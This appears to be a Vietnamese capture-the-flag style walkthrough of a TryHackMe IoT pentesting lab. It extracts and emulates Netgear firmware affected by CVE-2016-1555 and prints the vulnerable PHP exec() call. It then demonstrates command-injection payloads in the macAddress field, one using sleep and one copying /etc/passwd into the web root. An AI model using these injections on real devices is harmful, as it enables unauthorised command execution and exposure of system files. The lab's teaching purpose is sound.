Intro to IoT Pentesting

Vietnamese version

Overview

https://tryhackme.com/room/iotintro

Firmware là 1 phần của software, trong đó nó đóng vai trò điều khiển hardware. Không có firmware thì hardware vô nghĩa 💽

Firmware có thể được tải về từ các trang chủ của thiết bị, qua các trình update trên ứng dụng (Reverse Android app), qua sniffing các gói OTA (Over-the-air) trong quá trình update firmware của các thiết bị qua OTA và cuối cùng là dumping trực tiếp từ thiết bị.

Bài lab này sẽ sử dụng Firmware từng được sử dụng bởi Netgear cho 1 vài Access Point products và đã có CVE (CVE-2016-1555).

Start

Connect đến machine:

Username: iot Password: tryhackme123!

Machine IP: 10.10.x.x

Bạn có thể tải nó tai link này

Sau khi tải thì bạn hãy unzip toàn bộ file.

Đây là releaseNote của Firmware:

Và bạn có thể thấy rằng tôi có 1 file bin sau:

Extract với binwalk và cd vào trong thư mục extract đó bạn sẽ thấy 1 root structure folder:

Trong /home sẽ có 2 users là cli và www, trong đó:

• cli: chứa các config cho firmware

• www là nơi chứa các tệp php được sử dụng cho web application

Ở đây tôi biết được rằng file boardDataWW.php

chứa 1 vuln: Command Execution và ta sẽ khai thác bằng kĩ thuật Blind Command Execution

<?php
        $flag=false;
        $msg='';
        if (!empty($_REQUEST['writeData'])) {
                if (!empty($_REQUEST['macAddress']) && array_search($_REQUEST['reginfo'],Array('WW'=>'0','NA'=>'1'))!==false && ereg("[0-9a-fA-F]{12,12}",$_REQUEST['macAddress'],$regs)!==false) {
                        //echo "test ".$_REQUEST['macAddress']." ".$_REQUEST['reginfo'];
                        //exec("wr_mfg_data ".$_REQUEST['macAddress']." ".$_REQUEST['reginfo'],$dummy,$res);
                        exec("wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo'],$dummy,$res);
                        if ($res==0) {
                                conf_set_buffer("system:basicSettings:apName netgear".substr($_REQUEST['macAddress'], -6)."\n");
                                conf_save();
                                $msg = 'Update Success!';
                                $flag = true;
                        }
                }
                else
                        $flag = true;
        }

?>

Vulnerability

Ở bài lab này tôi sẽ sử dụng FAT (Firmware Analysis Toolkit) để emulation (mô phỏng) System

FAT (Firmware Analysis Toolkit)

FAT một công cụ base-on Firmadyne để dynamic analysis và mô phỏng các Linux-based embedded firmware. Công cụ này sử dụng PostgreSQL database để lưu trữ các thông tin về các firmware được mô phỏng

Đầu tiên nâng quyền cho firmware lên root và di chuyển nó vào toolkit folder:

cp rootfs.squashfs firmware-analysis-toolkit/ ; cd firmware-analysis-toolkit/ ; chown root:root rootfs.squashfs ; ll

Bây giờ tôi sẽ emulate system lên:

Ấn enter để tiếp tục:

Đăng nhập với credential là: admin:password

Sau khi Emulate system lên ta sẽ thiết lập tunnel cho máy ssh đến máy của tôi để access vào website:

ssh -N iot@10.10.238.238 -L 8081:192.168.0.100:80

Sau đó access vào host: http://localhost:8081 sử dụng credential hệt như trên lúc đăng nhập vào shell của netgear123456

Browser đến http://localhost:8081/boardDataWW.php

Đây chính là giao diện của nó.

Khởi động burpsuite.

Bây giờ tôi sẽ thử vài đường blind os command cơ bản để test xem

exec("wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo'],$dummy,$res);

Có thể viết tắt lại như sau:
=> wr_mfg_data -m {mac_address} -c {reginfo,$dummy,$res}

Payload chèn vào như sau:
=> wr_mfg_data -m ACDE48001122;sleep 10 # -c {reginfo,$dummy,$res}\

-> Nó active

Để chứng minh là nó hoạt động, tôi sẽ gửi payload sau:

ACDE48001122;+cp+/etc/passwd+.+#

Access đến /passwd:

Trên shell được emulate không có nc nên tôi sẽ không chạy reverse shell nữa để tránh phức tạp thêm.